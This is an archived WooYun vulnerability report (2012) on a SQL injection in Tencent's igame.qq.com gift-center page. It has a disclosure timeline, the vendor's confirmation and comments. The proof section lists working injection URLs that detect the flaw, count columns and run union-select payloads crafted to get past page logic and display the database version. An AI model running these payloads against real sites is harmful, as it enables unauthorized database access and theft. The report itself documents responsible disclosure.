腾讯游戏人生注入漏洞(附分析及绕过方式)

漏洞概要

缺陷编号:WooYun-2012-016107

漏洞标题:腾讯游戏人生注入漏洞(附分析及绕过方式)

相关厂商:腾讯

漏洞作者:路人甲

提交时间:2012-12-17 10:42

公开时间:2013-01-31 10:43

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2012-12-17: 细节已通知厂商并且等待厂商处理中
2012-12-17: 厂商已经确认,细节仅向厂商公开
2012-12-27: 细节向核心白帽子及相关领域专家公开
2013-01-06: 细节向普通白帽子公开
2013-01-16: 细节向实习白帽子公开
2013-01-31: 细节向公众公开

简要描述:

腾讯的游戏人生有一处注入漏洞,并未详细测试可获得信息

详细说明:

腾讯的游戏人生有一处注入漏洞,不过不知道能得到什么信息,有高手的话应该可以获取密码等等

漏洞证明:

http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987 and 1=1正常

http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987 and 1=2

order by 13的时候正常了说明13个字段,继续union,但是发现and 1=1的时候完全正常http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13and 1=2的时候失败鸟,为神马捏,初步分析是里面含有隐含的逻辑,注射成功但是由于业务逻辑无法在前台显示,可以这么试试http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987 and 1=2 union select 987,987,987,987,987,987,987,987,987,987,987,987,987这下成功了,然后再看看哪个字段是要被逻辑用到的吧http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987%20and%201=2%20union%20select%201,1,1,987,1,1,version%28%29,987,987,987,987,987,1这样就可以了嘛,用这个字段显示就可以

修复方案:

通常的防注入

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-12-17 14:13

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 xsjswt 白帽子 | Rank:146 漏洞数:38)

    游戏人生那边问题很多的。。。

  2. 2010-01-01 00:00 se55i0n 白帽子 | Rank:1483 漏洞数:156)

    洞主思路比较淫荡~